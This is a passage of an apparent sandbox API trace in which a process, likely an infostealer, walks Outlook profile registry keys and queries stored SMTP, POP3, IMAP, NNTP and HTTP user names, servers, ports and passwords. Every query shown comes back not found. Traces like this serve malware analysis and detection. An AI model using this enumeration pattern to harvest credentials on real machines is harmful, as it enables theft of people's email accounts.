lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.230] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.230] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.230] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.231] RegCloseKey (hKey=0x95c) returned 0x0 [0249.231] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.231] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.232] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.232] RegCloseKey (hKey=0x95c) returned 0x0 [0249.232] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.233] RegCloseKey (hKey=0x95c) returned 0x0 [0249.233] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.233] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.234] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.234] RegCloseKey (hKey=0x95c) returned 0x0 [0249.234] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x1c4e6a0 | out: phkResult=0x1c4e6a0*=0x95c) returned 0x0 [0249.235] RegEnumKeyExA (in: hKey=0x95c, dwIndex=0x0, lpName=0x1c4e6b0, lpcchName=0x1c4eed8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="00000001", lpcchName=0x1c4eed8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0249.235] lstrlenA (lpString="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0249.235] LocalAlloc (uFlags=0x40, uBytes=0xe0) returned 0xd19a290 [0249.235] wsprintfA (in: param_1=0xd19a290, param_2="%s\\%s" | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0249.235] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.235] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.235] RegCloseKey (hKey=0x944) returned 0x0 [0249.235] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.235] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.235] RegCloseKey (hKey=0x944) returned 0x0 [0249.235] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.235] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.235] RegCloseKey (hKey=0x944) returned 0x0 [0249.235] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.235] RegQueryValueExA (in: hKey=0x944, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.235] RegCloseKey (hKey=0x944) returned 0x0 [0249.235] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.235] RegQueryValueExA (in: hKey=0x944, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.235] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.236] RegCloseKey (hKey=0x944) returned 0x0 [0249.236] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4dc70 | out: phkResult=0x1c4dc70*=0x944) returned 0x0 [0249.236] RegQueryValueExA (in: hKey=0x944, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4dca8*=0x0) returned 0x2 [0249.237] 